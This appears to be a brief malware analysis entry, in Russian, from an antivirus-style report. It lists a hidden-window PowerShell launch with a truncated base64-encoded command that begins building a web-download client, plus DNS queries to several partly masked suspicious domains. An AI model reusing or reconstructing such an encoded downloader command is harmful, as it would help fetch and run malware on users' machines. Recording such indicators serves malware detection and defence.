Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8AXwBfAF8AMQAxAD0AKAAnAHYAXwAzADcAXwAnACsAJwAzADIAOAAnACkAOwAkAGEAMwAxADMAMgBfAF8AOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABIADEANQAzADIAXwBfAF8APQAoAC...
- DNS ASK no###indo.xyz
- DNS ASK ne##dev.com
- DNS ASK hu###onkey.com
- DNS ASK il####ujiday.com
- DNS ASK ma##x.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8AXwBfAF8AMQAxAD0AKAAnAHYAXwAzADcAXwAnACsAJwAzADIAOAAnACkAOwAkAGEAMwAxADMAMgBfAF8AOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABIADEANQAzADIAXwBfAF8APQAoAC...' (со скрытым окном)